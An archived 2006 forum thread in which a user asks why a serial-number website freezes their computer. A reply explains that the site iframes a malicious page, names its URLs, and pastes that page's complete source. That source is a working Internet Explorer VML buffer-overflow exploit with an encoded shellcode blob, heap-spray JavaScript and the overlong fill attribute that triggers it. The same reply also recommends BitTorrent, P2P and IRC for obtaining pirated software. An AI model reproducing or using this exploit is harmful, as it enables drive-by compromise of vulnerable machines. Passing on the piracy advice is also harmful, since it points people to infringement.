PDA

View Full Version : check this out


~~smart~fool~~
10-30-2006, 07:04 PM
ive come across this website that almost totally locks up my computer could someone explain that

http://www.seriall.com

beware it trys to give you a trojan.

Moonbat
10-30-2006, 08:44 PM
I've visited that site some times, for me I just close out the ad teling me to install something, and browse as normal.

Ezekiel
10-31-2006, 01:10 PM
ive come across this website that almost totally locks up my computer could someone explain that

http://www.seriall.com

beware it trys to give you a trojan.

That website is run by a script kiddy who uses code he didn't even create. He loads up this page in an iframe:

http://installare.net/e/t/ads_nl1.php?b=3020

And that page uses the VML exploit to install some crap onto the dumb user's computer. This is the source of that page:

<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<script>
shellcode = unescape("邐邐᛫房㌽㈰☰㵩찰쳌쳌쳌쳌쳌㓙嬤孛聛㎍ﴫ￿ǫ老౻甁ㄻ諉䤏즅᝴ㅇ㇒曀ދﲀ痿。裤ٔ䟜跬脳닮￿觿ㇷ曉螹㄂닒곜퀰ꩂ梨咉尻ꤌ㵫딏間蒄薅观莂눼꿈膚銝鞊鞟飒骆槌睶㽴⠩条罹慭湢瑢紼慱爹瀷㕳畬퍮 ﷼￾笠︇瞰던佲⦇䅀牂얄䄺薖䔾ᧆ酈엘쉔啔᝖늺�챚彞慠媧顤霯髥᪷⍰﬜礸蚔蔡Ǿ肌럷�퓞�ɲ秉讦䉫座�ᛩﻊ컏峳婷寓㇀⅔劢≹틦窃摉뉐뮺좼�ꦠ잪鰷䈲㶉먱뤬ᦆ䑻I馲��럞㐙걡昆坪釰蹹簘 丰塚ﯺ夏㦟െ믿ࠉ਋觏࣢ഌ龞膀鏕ᛸ᜖覈變鷛ᳮ℠뎲떴꟠⫝̸⬪Ꙅ썳ꦹデ㔴럱㫁㬺㷿㼾쇍䂪䕄鞹ꢑ羓ᙨᐕ턋ꞹ퐲⺕Ꙙ튉㮃食慌㌲椨隄莽浧潮ȅė䝇ፘᔔ葺⦸注䗹竾ੑ變ﮐ쎒䙫圓뷬뇢၀癟␯ꗍꞦ囸ﵹ계ꖹ仙㹥�랶桅籗 ⺨⌌㪤餈ᠵ頏ﺘ묂诲庰잖ᥝ힢鵗哒﶐桏ꥣ�尥摖隆℅ᵽꪨꤻ꺨ꪪ뭵ᔤ垉ᤠ䎏ᔬ徃ᤨ掅Դ嚙鸨ቂᡠ郰Ֆ䖕⃿색氖Ꭽ⢣᫄퇓জ䟒㫹︹집䄇✚ꀵᧉ䑠↭䗃쀁儖ꑏ䷛務뺿晔ڃ؄Ԇ鯝ꉨѢŭƘʶ");
bigblock = unescape("邐邐");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<450;i++) memory[i] = block + shellcode;
</script><body>
<v:rect style='width:120pt;height:80pt' fillcolor="red">
<v:fill method="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCഁ഍䑄䑄഍഍" angle="-45"
focus="100%" focusposition=".5,.5" focussize="0,0"
type="gradientRadial" />
</v:rect>
</body>
</html></v:rect>
</body>
</html>

The only people vulnerable to that exploit are IE users who have some sort of objection to updating their computer, who reject superior browsers such as FF and Opera, and browse lame crack websites, so it's their fault.

People that use serial or crack websites are seriously stupid. It is the sign of an incompetent computer user when they think searching google for "pirated software" and "cracks for *" will give them free software. All you will find are warez portals that load your computer with malware.

Bittorrent, p2p networks, and IRC DCC file transfers are the ways to illegally obtain software or movies.

~~smart~fool~~
11-01-2006, 03:23 PM
lmao thanks mike